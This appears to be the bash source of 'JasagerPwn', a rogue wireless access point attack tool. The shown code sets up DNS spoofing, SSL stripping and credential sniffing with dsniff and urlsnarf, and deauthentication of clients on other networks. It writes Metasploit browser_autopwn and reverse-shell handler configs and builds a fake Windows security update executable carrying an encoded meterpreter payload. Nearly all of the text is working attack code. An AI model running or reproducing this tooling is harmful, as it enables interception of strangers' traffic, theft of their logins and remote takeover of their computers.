xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing Sniffing Apps" -e "killall -9 dhcpd3 airbase-ng ettercap sslstrip driftnet urlsnarf"

xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing DNS Spoof" -e "killall -9 dnsspoof"

xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing WICD" -e "killall -9 wicd && killall -9 wicd-client"

xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing WICD" -e "/etc/init.d/wicd stop"

xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing WICD" -e "killall -9 dhclient"

xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing WICD" -e "killall -9 dhclient3"

resolvIDs=`ps aux | grep "bash /tmp/resolv" | grep -v grep | awk '{ print $2 }'`

echo -e "\e[01;32m[>]\e[00m Checking Environment..."

#Check for root

if [ "$(id -u)" != "0" ]; then echo -e "\e[01;31m[!]\e[00m FATAL: Not Root.." && cleanup ; fi

#Dependencies checks

dhcp3check=`dpkg -l | grep dhcp3-server | awk '{print $2}' | head -n 1`

apache2check=`dpkg -l | grep apache2 | awk '{print $2}' | head -n 1`

apache2phpcheck=`dpkg -l | grep "libapache2-mod-php5" | awk '{print $2}' | head -n 1`

dsniffcheck=`dpkg -l | grep dsniff | awk '{print $2}' | head -n 1`

php5check=`dpkg -l | grep php5 | awk '{print $2}' | head -n 1`

phpPearcheck=`dpkg -l | grep php-pear | awk '{print $2}' | head -n 1`

macchangerCheck=`dpkg -l | grep macchanger | awk '{print $2}' | head -n 1`

aircrackCheck=`dpkg -l | grep aircrack | awk '{print $2}' | head -n 1`

sleep 1

t="0"

if [ ! $dhcp3check ] || [ ! $apache2check ] || [ ! $apache2phpcheck ] || [ ! $dsniffcheck ] || [ ! $phpPearcheck ] ||[ ! $php5check ] || [ ! $macchangerCheck ] || [ ! -e "/usr/bin/airdrop-ng" ] || [ ! -e $SETpath/src/payloadgen/pefile.py ]; then

echo && echo -e "\e[01;31m[!]\e[00m Some dependencies were not found.. We will try to install them now..." && echo

t="1"

elif [ ! -e "/usr/local/bin/sslstrip" ] && [ ! -e "/usr/bin/sslstrip" ] && [ $t -eq 0 ]; then

echo && echo -e "\e[01;31m[!]\e[00m Some dependencies were not found.. We will try to install them now..." && echo

elif [ ! $aircrackCheck ] && [ ! -e "/usr/local/bin/aircrack-ng" ] && [ $t -eq 0 ]; then

echo && echo -e "\e[01;31m[!]\e[00m Some dependencies were not found.. We will try to install them now..." && echo

# dhcp3-server check

if [ ! $dhcp3check ]; then

echo -e "\e[01;31m[!]\e[00m No dhcp3-server was detected... Installing.."

xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "sudo apt-get -y install dhcp3-server && update-rc.d -f dhcp3-server remove"

# dsniff check

if [ ! $dsniffcheck ]; then

echo -e "\e[01;31m[!]\e[00m No Dsniff suite was detected... Installing.."

xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "sudo apt-get -y install dsniff"

# apache2 check

if [ ! $apache2check ]; then

echo -e "\e[01;31m[!]\e[00m No apache2 server was detected... Installing.."

xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "sudo apt-get -y install apache2 && update-rc.d -f apache2 remove"

elif [ ! $apache2phpcheck ]; then

echo -e "\e[01;31m[!]\e[00m No apache2 PHP5 module was detected... Installing.."

xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "sudo apt-get -y install libapache2-mod-php5"

# php5 check

if [ ! $php5check ]; then

echo -e "\e[01;31m[!]\e[00m No PHP5 was detected... Installing.."

xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "sudo apt-get -y install php5 php5-curl"

# php5pear check

if [ ! $phpPearcheck ]; then

echo -e "\e[01;31m[!]\e[00m No PHP-Pear was detected... Installing.."

xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "sudo apt-get -y install php-pear"

# macchanger check

if [ ! $macchangerCheck ]; then

echo -e "\e[01;31m[!]\e[00m No Macchanger was detected... Installing.."

xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "sudo apt-get -y install macchanger"

# aircrack-ng check

if [ ! $aircrackCheck ] && [ ! -e "/usr/local/bin/aircrack-ng" ]; then

echo -e "\e[01;31m[!]\e[00m No Aircrack-ng suite was detected... Installing.."

xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "sudo apt-get -y install aircrack-ng"

#sslstrip check

if [ ! -e "/usr/local/bin/sslstrip" ] && [ ! -e "/usr/bin/sslstrip" ]; then

xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "sudo apt-get -y install python-twisted-web python-twisted-web2 linux-headers-`uname -r` build-essential gcc g++"

wget -q -P "/tmp" http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.8.tar.gz

tar xf /tmp/sslstrip-0.8.tar.gz -C "/tmp/" && sleep .5

chmod -R +x /tmp/sslstrip-0.8/*.py

xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "cd /tmp/sslstrip-0.8/ && python setup.py install"

if [ -d "/tmp/sslstrip-0.8/" ]; then rm -rf /tmp/sslstrip-0.8/ ; fi

#airdrop-ng check

if [ ! -e "/usr/bin/airdrop-ng" ]; then

if [ -e "/pentest/wireless/aircrack-ng/scripts/airdrop-ng/install.py" ]; then

xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "apt-get -y install linux-headers-$(uname -r) build-essential make patch autoconf python python-dev make patch gettext autoconf python-psyco subversion tcl8.5 openssl zlib1g zlib1g-dev libssh2-1-dev libssl-dev libnl1 libnl-dev libpcap0.8 libpcap0.8-dev python-scapy cracklib-runtime"

chmod +x /pentest/wireless/aircrack-ng/scripts/airdrop-ng/install.py

xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "cd /pentest/wireless/aircrack-ng/scripts/airdrop-ng/ && python install.py" && sleep .5

xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "airdrop-ng -u OUIUPDATE"

else

echo -e "\e[01;31m[!]\e[00m Cant Find Airdrop-ng Installer in /pentest.. Ill get it for you now.."

mkdir /pentest/wireless/

wget -q -P "/pentest/wireless/" http://info-s3curity.com/jasagerpwn/airdrop-ng.tar.gz

tar xf "/pentest/wireless/airdrop-ng.tar.gz"

chmod +x /pentest/wireless/airdrop-ng/install.py

xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "cd /pentest/wireless/airdrop-ng/ && python install.py" && sleep .5

xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "cd airdrop-ng -u OUIUPDATE"

rm -f "/pentest/wireless/airdrop-ng.tar.gz"

#metasploit check

if [ ! -e "$msfpath/msfconsole" ]; then echo && echo -e "\e[01;31m[!]\e[00m ERROR: Metasploit wasnt found in: "$msfpath"" && echo && cleanup; fi

#SET check

if [ ! -e "$SETpath/set-automate" ]; then

echo && echo -e "\e[01;31m[!]\e[00m ERROR: Social Engineering Toolkit wasnt found in: "$SETpath"" && echo && cleanup

else

# python pefile module - thanks redmeat_uk

if [ ! -e "$SETpath/src/payloadgen/pefile.py" ]; then

echo -e "\e[01;31m[!]\e[00m No Python PEfile module was detected... Installing.."

if [ -e "/tmp/pefile-1.2.10-102.tar.gz" ]; then rm -rf /tmp/pefile-1.2.10-102* ; fi

wget -q -P "/tmp" http://pefile.googlecode.com/files/pefile-1.2.10-102.tar.gz

tar xf /tmp/pefile-1.2.10-102.tar.gz -C /tmp/

mv /tmp/pefile-1.2.10-102/pefile.py $SETpath/src/payloadgen/

chmod +x $SETpath/src/payloadgen/pefile.py

if [ -e "$SETpath/src/payloadgen/pefile.py" ]; then

echo -e "\e[01;31m[!]\e[00m Installation Complete!"

elif [ ! -e "$SETpath/src/payloadgen/pefile.py" ]; then

echo -e "\e[01;31m[!]\e[00m Installation Failed!"

if [ -d "/tmp/pefile-1.2.10-102/" ]; then rm -rf /tmp/pefile-1.2.10-102/ ; fi

#Put up monitor interface

monAttempts="0"

while [ ! $moncheck ];

if [ $monAttempts -ge "3" ]; then echo -e "\e[01;31m[!]\e[00m FATAL: Couldn't Start $MIFACE" && cleanup; fi

moncheck=`ifconfig | grep $MIFACE | awk '{print $1}' | cut -b 4`

xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Start $MIFACE" -e "airmon-ng start $WIFACE"

moncheck=`ifconfig | grep $MIFACE | awk '{print $1}' | cut -b 4`

monAttempts=$(($monAttempts+1))

done

#copy over DNS compatable persistence script for backdoor

if [ ! -e "$msfpath/scripts/meterpreter/persistence_dns.rb" ]; then cp src/resources/persistence_dns.rb "$msfpath/scripts/meterpreter/" ; fi

#cleanup www folders

if [ -d "$Gwww/" ] ; then rm -rf $Gwww/ ; fi

if [ -d "$Jwww/" ] ; then rm -rf $Jwww/ ; fi

if [ -d "$Fwww/" ] ; then rm -rf $Fwww/ ; fi

sleep .5 #Copy over new WWW sites

if [ ! -d "$Jwww" ]; then mkdir $Jwww/ ; fi

if [ ! -d "$Gwww" ]; then mkdir $Gwww/ ; fi

if [ ! -d "$Fwww" ]; then mkdir $Fwww/ ; fi

#backup old default index.html

if [ -e /var/www/index.htm ]; then

mv /var/www/index.htm /var/www/index.htm.OLD

elif [ -e /var/www/index.html ]; then

mv /var/www/index.html /var/www/index.html.OLD

#remove old version stuff

if [ -d "/var/www/pyjasager/" ] ; then rm -rf "/var/www/pyjasager/" ; fi

if [ -e "/etc/apache2/sites-available/pyjasager" ]; then rm -f "/etc/apache2/sites-available/pyjasager" ; fi

#Check for updates

if [ ! $googleRev ]; then

echo -n

elif [ $googleRev -gt $rev ]; then

echo

echo -e "\e[01;31m[!]\e[00m UPDATE: There is an update available!!! Run ./jasagerPwn -u"

echo

elif [ $googleRev -lt $rev ]; then

echo

echo -e "\e[01;31m[!]\e[00m UPDATE: JasagerPwn Revisions have been RESET, Please Re-Download It!"

echo -e "\e[01;31m[!]\e[00m Command: svn checkout http://jasagerpwn.googlecode.com/svn/trunk/ jasager-pwn"

echo

echo -e "\e[01;32m[>]\e[00m Creating scripts..."

#Dynamic line number varaibles incase set_config changes in future updates, which it does and will.

SETapache=`cat $SETpath/config/set_config | grep -n "APACHE_SERVER" | awk -F: '{print $1}'`

SETapacheDIR=`cat $SETpath/config/set_config | grep -n "APACHE_DIRECT" | awk -F: '{print $1}'`

SETredirect=`cat $SETpath/config/set_config | grep -n "AUTO_REDIRECT" | awk -F: '{print $1}'`

SETmetscript=`cat $SETpath/config/set_config | grep -n "METERPRETER_MULTI_SCRIPT" | awk -F: '{print $1}'`

SETrepeater=`cat $SETpath/config/set_config | grep -n "JAVA_REPEATER=OFF" | awk -F: '{print $1}'`

#SET_CONFIG Text Parsing Variables - for javapwn

APACHESVR=`cat $SETpath/config/set_config | grep "APACHE_SERVER=ON"`

APACHEDIR=`cat $SETpath/config/set_config | grep "/var/www/javapwn"`

meterpreterS=`cat $SETpath/config/set_config | grep "METERPRETER_MULTI_SCRIPT=ON"`

AREDIRECT=`cat $SETpath/config/set_config | grep "AUTO_REDIRECT=OFF"`

JREPEATER=`cat $SETpath/config/set_config | grep "JAVA_REPEATER=ON"`

#backup orignal SET config

if [ ! -e "$SETpath/config/set_config.ORIGINAL" ]; then

cp -f $SETpath/config/set_config $SETpath/config/set_config.ORIGINAL

#Customize SET config to how we want it..

if [ ! "$APACHESVR" ]; then

sed ''${SETapache}'s!APACHE_SERVER=OFF!APACHE_SERVER=ON!g' $SETpath/config/set_config > $SETpath/config/set_config2

elif [ "$APACHESVR" ]; then

mv $SETpath/config/set_config $SETpath/config/set_config2

sleep 1

if [ ! "$APACHEDIR" ]; then

sed ''${SETapacheDIR}'s!APACHE_DIRECTORY=/var/www!APACHE_DIRECTORY=/var/www/google!g' $SETpath/config/set_config2 > $SETpath/config/set_config3

elif [ "$APACHEDIR" ]; then

mv $SETpath/config/set_config2 $SETpath/config/set_config3

sleep 1

if [ ! "${AREDIRECT}" ]; then

sed ''${SETredirect}'s!AUTO_REDIRECT=ON!AUTO_REDIRECT=OFF!g' $SETpath/config/set_config3 > $SETpath/config/set_config4

elif [ "$AREDIRECT" ]; then

mv $SETpath/config/set_config3 $SETpath/config/set_config4

sleep 1

if [ ! "${JREPEATER}" ]; then

sed ''${SETrepeater}'s!JAVA_REPEATER=OFF!JAVA_REPEATER=ON!g' $SETpath/config/set_config4 > $SETpath/config/set_config5

elif [ "$JREPEATER" ]; then

mv $SETpath/config/set_config4 $SETpath/config/set_config5

sleep 1

if [ "$autoMetScript" -eq "1" ] && [ ! "$JREPEATER" ]; then

sed ''${SETmetscript}'s!METERPRETER_MULTI_SCRIPT=OFF!METERPRETER_MULTI_SCRIPT=ON!g' $SETpath/config/set_config5 > $SETpath/config/set_config6

elif [ "$autoMetScript" -eq "1" ] && [ "$JREPEATER" ]; then

sed ''${SETmetscript}'s!METERPRETER_MULTI_SCRIPT=OFF!METERPRETER_MULTI_SCRIPT=ON!g' $SETpath/config/set_config4 > $SETpath/config/set_config5

sleep 1

#move config to right spot

if [ -e "$SETpath/config/set_config6" ]; then

mv $SETpath/config/set_config6 $SETpath/config/set_config

if [ "$autoMetScript" -eq "0" ] && [ -e "$SETpath/config/set_config5" ] ; then

mv $SETpath/config/set_config5 $SETpath/config/set_config

elif [ "$autoMetScript" -eq "1" ] && [ -e "$SETpath/config/set_config5" ] ; then

mv $SETpath/config/set_config5 $SETpath/config/set_config

elif [ "$autoMetScript" -eq "1" ] && [ -e "$SETpath/config/set_config6" ] ; then

mv $SETpath/config/set_config6 $SETpath/config/set_config

sleep 3

#make sure we clean up

if [ -e "$SETpath/config/set_config2" ]; then rm $SETpath/config/set_config2 ; fi

if [ -e "$SETpath/config/set_config3" ]; then rm $SETpath/config/set_config3 ; fi

if [ -e "$SETpath/config/set_config4" ]; then rm $SETpath/config/set_config4 ; fi

if [ -e "$SETpath/config/set_config5" ]; then rm $SETpath/config/set_config5 ; fi

if [ -e "$SETpath/config/set_config6" ]; then rm $SETpath/config/set_config6 ; fi

#Make loop script to isnure our DNS and IP doesnt screw us if we change networks.

cp /etc/resolv.conf /etc/resolv.conf.ORIGINAL

echo "while true ; do echo "nameserver 4.2.2.2" > /etc/resolv.conf && sleep 30 ; done &" > /tmp/resolv.sh

chmod +x /tmp/resolv.sh

bash /tmp/resolv.sh &

dnsID2=`echo $!`

#Parse wwwFakeUpdate pages with our IP for java applet in fake update attack

nixLine=`cat $SPWD/src/wwwFakeUpdate/ubuntu/index.html | grep -n REPLACEMEAPPLET | awk -F: '{ print $1 }'`

nixFakeUpdate=`cat $SPWD/src/wwwFakeUpdate/ubuntu/index.html | grep REPLACEMEAPPLET`

osxLine=`cat $SPWD/src/wwwFakeUpdate/osx/index.html | grep -n REPLACEMEAPPLET | awk -F: '{ print $1 }'`

osxFakeUpdate=`cat $SPWD/src/wwwFakeUpdate/osx/index.html | grep REPLACEMEAPPLET`

if [ "$nixFakeUpdate" ]; then

sed ''${nixLine}'s!http://REPLACEMEAPPLET/ubuntu/nix.bin!http://'$fonIP'/ubuntu/nix.bin!g' $SPWD/src/wwwFakeUpdate/ubuntu/index.html > $SPWD/src/wwwFakeUpdate/ubuntu/index.html2

sleep .5 && mv $SPWD/src/wwwFakeUpdate/ubuntu/index.html2 $SPWD/src/wwwFakeUpdate/ubuntu/index.html

if [ "$osxFakeUpdate" ]; then

sed ''${osxLine}'s!http://REPLACEMEAPPLET/osx/osx.bin!http://'$fonIP'/osx/osx.bin!g' $SPWD/src/wwwFakeUpdate/osx/index.html > $SPWD/src/wwwFakeUpdate/osx/index.html2

sleep .5 && mv $SPWD/src/wwwFakeUpdate/osx/index.html2 $SPWD/src/wwwFakeUpdate/osx/index.html

if [ -e "$SPWD/src/wwwFakeUpdate/ubuntu/index.html2" ]; then rm $SPWD/src/wwwFakeUpdate/ubuntu/index.html2 ; fi

if [ -e "$SPWD/src/wwwFakeUpdate/osx/index.html2" ]; then rm $SPWD/src/wwwFakeUpdate/osx/index.html2 ; fi

#backup original SET templates

if [ -e "$SETpath/src/html/templates/java/index.template" ]; then

mv "$SETpath/src/html/templates/java/index.template" "$SETpath/src/html/templates/java/index.template.ORIGINAL"

cp -rf src/wwwJava/* $SETpath/src/html/templates/java/

else

cp -rf src/wwwJava/* $SETpath/src/html/templates/java/

if [ -e "$SETpath/src/html/templates/google/index.template" ]; then

mv "$SETpath/src/html/templates/google/index.template" "$SETpath/src/html/templates/google/index.template.ORIGINAL"

cp -rf src/wwwGoogle/* $SETpath/src/html/templates/google/

else

cp -rf src/wwwGoogle/* $SETpath/src/html/templates/google/

#Copy over our web templates

cp -rf src/wwwGoogle/* $Gwww/ # google page

cp -rf src/wwwJava/* $Jwww/ # java required page

cp -rf src/wwwFakeUpdate/* $Fwww/ #FakeUpdate Page

#Change ownership of web directories

chown -R www-data:www-data /var/www/

#Airdrop-ng deauth configuration / rules

if [ -e "/tmp/deauth.conf" ] ; then rm "/tmp/deauth.conf" ; fi

echo "# Jasager - deauth.conf v$version

a/$ourAPmac|any

a/00:00:00:00:00:00|any

d/any|any" > /tmp/deauth.conf

#Add our wifi gateway if needed

wifiMAC=`ifconfig $IFACE | grep "HWaddr" | awk '{print $5}' | tr "[a-z]" "[A-Z]"`

if [ $WiFiMODE -eq "1" ]; then

newIFACEmac=`iwconfig $IFACE | grep "Access Point" | awk '{print $6}'`

echo "a/$newIFACEmac|$wifiMAC" >> /tmp/deauth.conf

# DNS Hosts File. Everything to us.

if [ -e /tmp/jasagerpwn.dns ]; then rm -f /tmp/jasagerpwn.dns; fi

echo "$fonIP *" > /tmp/jasagerpwn.dns

#Vhosts javapwn

vhost="/etc/apache2/sites-available/javapwn"

if [ -e "$vhost" ] ; then rm "$vhost"; fi

echo "<VirtualHost *:80>

ServerAdmin webmaster@localhost

DocumentRoot $Jwww

Options FollowSymLinks

AllowOverride None

</Directory>

Options Indexes FollowSymLinks MultiViews

AllowOverride None

Order allow,deny

allow from all

</Directory>

ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/

AllowOverride None

Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch

Order allow,deny

Allow from all

</Directory>

ErrorLog /var/log/apache2/error.log

# Possible values include: debug, info, notice, warn, error, crit,

# alert, emerg.

LogLevel warn

CustomLog /var/log/apache2/access.log combined

Alias /doc/ "/usr/share/doc/"

Options Indexes MultiViews FollowSymLinks

AllowOverride None

Order deny,allow

Deny from all

Allow from 127.0.0.0/255.0.0.0 ::1/128

</Directory>

ErrorDocument 403 /

ErrorDocument 404 /

</VirtualHost>" >> $vhost

#Vhosts google

vhost2="/etc/apache2/sites-available/google"

if [ -e "$vhost2" ] ; then rm "$vhost2"; fi

echo "<VirtualHost *:80>

ServerAdmin webmaster@localhost

DocumentRoot $Gwww

Options FollowSymLinks

AllowOverride None

</Directory>

Options Indexes FollowSymLinks MultiViews

AllowOverride None

Order allow,deny

allow from all

</Directory>

ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/

AllowOverride None

Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch

Order allow,deny

Allow from all

</Directory>

ErrorLog /var/log/apache2/error.log

# Possible values include: debug, info, notice, warn, error, crit,

# alert, emerg.

LogLevel warn

CustomLog /var/log/apache2/access.log combined

Alias /doc/ "/usr/share/doc/"

Options Indexes MultiViews FollowSymLinks

AllowOverride None

Order deny,allow

Deny from all

Allow from 127.0.0.0/255.0.0.0 ::1/128

</Directory>

ErrorDocument 403 /

ErrorDocument 404 /

</VirtualHost>" >> $vhost2

#Vhosts fakeupdate

vhost3="/etc/apache2/sites-available/fakeupdate"

if [ -e "$vhost3" ] ; then rm "$vhost3"; fi

echo "<VirtualHost *:80>

ServerAdmin webmaster@localhost

DocumentRoot $Fwww

Options FollowSymLinks

AllowOverride None

</Directory>

Options Indexes FollowSymLinks MultiViews

AllowOverride None

Order allow,deny

allow from all

</Directory>

ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/

AllowOverride None

Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch

Order allow,deny

Allow from all

</Directory>

ErrorLog /var/log/apache2/error.log

# Possible values include: debug, info, notice, warn, error, crit,

# alert, emerg.

LogLevel warn

CustomLog /var/log/apache2/access.log combined

Alias /doc/ "/usr/share/doc/"

Options Indexes MultiViews FollowSymLinks

AllowOverride None

Order deny,allow

Deny from all

Allow from 127.0.0.0/255.0.0.0 ::1/128

</Directory>

ErrorDocument 403 /index.php

ErrorDocument 404 /index.php

</VirtualHost>" >> $vhost3

#SET automate scripts, can be TOUCHY.

#run as template rather then imported

if [ -e "/tmp/auto-java2" ] ; then rm "/tmp/auto-java2" ; fi

echo -e "\n2\n1\n1\n1\n2\n16" > /tmp/auto-java2

#run as template rather then imported

if [ -e "/tmp/auto-google2" ] ; then rm "/tmp/auto-google2" ; fi

echo -e "\n2\n1\n1\n3\n2\n16" > /tmp/auto-google2

if [ $autoMetScript -eq 1 ]; then

metScript

#Metasploit rc w/ auto script BP

if [ -e "/tmp/msfrcBP" ] ; then rm "/tmp/msfrcBP" ; fi

echo -e "use auxiliary/server/browser_autopwn

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST $fonIP

set SRVPORT 80

set SRVHOST $fonIP

set URIPATH /

set ExitOnSession false

set InitialAutorunScript multiscript -rc $SETpath/src/program_junk/multi_meter.file

run -j" > /tmp/msfrcBP

#Metasploit rc auto script FU

if [ -e "/tmp/msfrcFU" ] ; then rm "/tmp/msfrcFU" ; fi

echo -e "use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST $fonIP

set LPORT $winPORT

set InitialAutorunScript multiscript -rc $SETpath/src/program_junk/multi_meter.file

set ExitOnSession false

exploit -j

set PAYLOAD osx/x86/shell_reverse_tcp

set LHOST 0.0.0.0

set LPORT $osxPORT

set InitialAutorunScript multiscript -rc $SETpath/src/program_junk/multi_meter.file

set ExitOnSession false

exploit -j

set PAYLOAD linux/x86/shell/reverse_tcp

set LHOST 0.0.0.0

set LPORT $nixPORT

set InitialAutorunScript multiscript -rc $SETpath/src/program_junk/multi_meter.file

set ExitOnSession false

exploit -j" > /tmp/msfrcFU

elif [ $autoMetScript -eq 0 ]; then

#Metasploit rc no auto script BP

if [ -e "/tmp/msfrcBP" ] ; then rm "/tmp/msfrcBP" ; fi

echo -e "use auxiliary/server/browser_autopwn

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST $fonIP

set SRVPORT 80

set SRVHOST $fonIP

set URIPATH /

set ExitOnSession false

run -j" > /tmp/msfrcBP

#Metasploit rc no auto script FakeUpdate

if [ -e "/tmp/msfrcFU" ] ; then rm "/tmp/msfrcFU" ; fi

echo -e "use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST $fonIP

set LPORT $winPORT

set ExitOnSession false

exploit -j

set PAYLOAD osx/x86/shell_reverse_tcp

set LHOST 0.0.0.0

set LPORT $osxPORT

set ExitOnSession false

exploit -j

set PAYLOAD linux/x86/shell/reverse_tcp

set LHOST 0.0.0.0

set LPORT $nixPORT

set ExitOnSession false

exploit -j" > /tmp/msfrcFU

sleep 1 && echo -e "\e[01;32m[>]\e[00m Enabling ipv4 Forwarding..."

xterm -geometry 0x0+0+0 -e "modprobe tun" &

echo "1" > /proc/sys/net/ipv4/ip_forward

#tail messages for DHCP info

xterm -geometry 75x16+0+509 -bg black -fg red -T "[JasagerPwn-DHCP] v$version" -e "tail -f /var/log/messages | grep DHCP" &

messageID=`echo $!`

echo -e "\e[01;32m[>]\e[00m Starting up DHCP3..."

xterm -geometry 75x9+0+474 -bg black -fg green -T "Starting DHCP3 Server" -e "/etc/init.d/dhcp3-server start" &

echo -e "\e[01;32m[>]\e[00m Loading URL Snarf/Driftnet..."

xterm -geometry 0x0+0+0 -e "driftnet -v -s -i $FONIFACE" &

xterm -geometry 75x24+464+405 -bg black -fg green -T "[JasagerPwn-DSniff] v$version" -e "dsniff -i $FONIFACE" &

dsniffID=`echo $!`

xterm -geometry 75x37+0+0 -bg black -fg green -T "[JasagerPwn-URLSnarf] v$version" -e "urlsnarf -i $FONIFACE" &

echo -e "\e[01;32m[>]\e[00m Setting up IP Tables..."

IPTABLES

echo -e "\e[01;36m[~]\e[00m leg3nd's JasagerPwn v$version Rev$revision Started! More @ www.info-s3curity.com"

echo -e "\e[01;36m[~]\e[00m ALL Attacks are now operating system agnostic OSX/MS/Linux!!"

#MAIN OPTIONS FOR AP ATTACKS

while true

echo

ifconfig $FONIFACE $fonIP

ourIP=`ifconfig $FONIFACE | awk '/inet addr/ {split ($2,A,":"); print A[2]}'`

echo -e "\e[01;31m[+][-----------------------------------------------------------------][+]\e[00m"

echo -e "\e[01;31m[+][==========================-Main Menu-============================][+]\e[00m"

echo -e "\e[01;31m[+][-----------------------------------------------------------------][+]\e[00m"

#echo -e "\e[01;32m[!]\e[00m Press [S]niff, [F]akeUpdate, [D]eAuth, [B]rowserPwn, [J]ava Attack, e[X]it "

if [ $sniffing -eq 0 ] && [ $browserpwn -eq 0 ] && [ $fakeupdate -eq 0 ] && [ $javaATK -eq 0 ]; then

echo -e "\e[01;36m [*] Attack Status: Idle..\e[00m"

elif [ $sniffing -eq 1 ]; then

echo -e "\e[01;31m [*] Attack Status: SSLstrip & Sniffing\e[00m"

elif [ $browserpwn -eq 1 ]; then

echo -e "\e[01;31m [*] Attack Status: MSF Browser-AutoPwn\e[00m"

elif [ $fakeupdate -eq 1 ]; then

echo -e "\e[01;31m [*] Attack Status: MSF Fake Update\e[00m"

elif [ $javaATK -eq 1 ]; then

echo -e "\e[01;31m [*] Attack Status: SET Java Applet\e[00m"

echo -e "\e[01;32m[-]\e[00m [1][S] = Sniff The APs Network."

echo -e "\e[01;32m[-]\e[00m [2][F] = Redirect LAN to Fake Security Update Page."

echo -e "\e[01;32m[-]\e[00m [3][B] = Redirect LAN to Metasploit BrowserAutopwn."

echo -e "\e[01;32m[-]\e[00m [4][J] = Redirect LAN to Java Applet Page."

echo -e "\e[01;32m[-]\e[00m [5][D] = De-Authorize Clients on other APs."

echo -e "\e[01;32m[-]\e[00m [6][N] = Adjust Script & Network Settings"

echo -e "\e[01;32m[-]\e[00m [7][X] = Exit JasagerPwn Script"

echo -n -e "\e[01;31m [?] Choose an attack for AP:\e[00m "

read -e CONFIRM3

echo

case $CONFIRM3 in

s|S|sniff|Sniff|1)

if [ $browserpwn -eq 1 ]; then

echo -e "\e[01;31m[!]\e[00m Error: Cant run with browserPwn. IPtables Conflict."

elif [ $javaATK -eq 1 ]; then

echo -e "\e[01;31m[!]\e[00m Error: Cant run with Java Applet Attack. IPtables Conflict."

elif [ $fakeupdate -eq 1 ]; then

echo -e "\e[01;31m[!]\e[00m Error: Cant run with FakeUpdate. IPtables Conflict."

elif [ $sniffing -eq 0 ]; then

iptables -t nat -A PREROUTING --in-interface $FONIFACE -p tcp --destination-port 80 -j REDIRECT --to-ports $sslport

xterm -geometry 75x3+1-25 -bg black -fg green -e "sslstrip -l $sslport && sleep 3" &

if [ -e sslstrip.log ]; then

xterm -geometry 75x24+464+65 -bg black -fg green -T "SSLStrip Sniffing" -e "tail -f sslstrip.log" &

TAILPID=`echo $!`

else

touch sslstrip.log

xterm -geometry 75x24+464+65 -bg black -fg green -T "SSLStrip Sniffing" -e "tail -f sslstrip.log" &

TAILPID=`echo $!`

echo -e "\e[01;33m[!]\e[00m\e[00m Attack Started: SSLStripping / Sniffing"

wasSniffing="1"

sniffing="1"

elif [ $sniffing -eq 1 ]; then

echo -e "\e[01;31m[!]\e[00m Error: Your Already Sniffing!!"

;;

F|f|fakeupdate|Fakeupdate|2)

if [ $fakeupdate -eq 1 ]; then

updateLoop

elif [ $browserpwn -eq 1 ]; then

echo -e "\e[01;31m[!]\e[00m Error: Cant run with BrowserPwn. Port conflict."

elif [ $javaATK -eq 1 ]; then

echo -e "\e[01;31m[!]\e[00m Error: Cant run with Java Applet Attack. IPtables Conflict."

elif [ $fakeupdate -eq 0 ]; then

fakeupdate="1"

if [ -e "$Fwww/ms/Windows-KB183905-x86-ENU.exe" ]; then rm -f "$Fwww/ms/Windows-KB183905-x86-ENU.exe"; fi

xterm -geometry 75x15+10+0 -bg black -fg green -T "[Metasploit Payload] v$version - Metasploit (Windows)" -e "msfpayload windows/meterpreter/reverse_tcp LHOST=$fonIP LPORT=$winPORT R | msfencode -x $SPWD/src/resources/NOTEPAD.EXE -t exe -e x86/shikata_ga_nai -c 10 -o $Fwww/ms/Windows-KB183905-x86-ENU.exe"

fakeupdate && updateLoop

;;

B|b|browserpwn|browserPwn|3)

if [ $fakeupdate -eq 1 ]; then

echo -e "\e[01;31m[!]\e[00m Error: Cant run with FakeUpdate. Port conflict."

elif [ $javaATK -eq 1 ]; then

echo -e "\e[01;31m[!]\e[00m Error: Cant run with Java Applet Attack. IPtables Conflict."

elif [ $browserpwn -eq 0 ]; then

if [ $autoMetScript -eq 1 ]; then metScript; fi

xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-DNS Kill] v$version - Killing DNSSpoof" -e "killall -9 dnsspoof" &

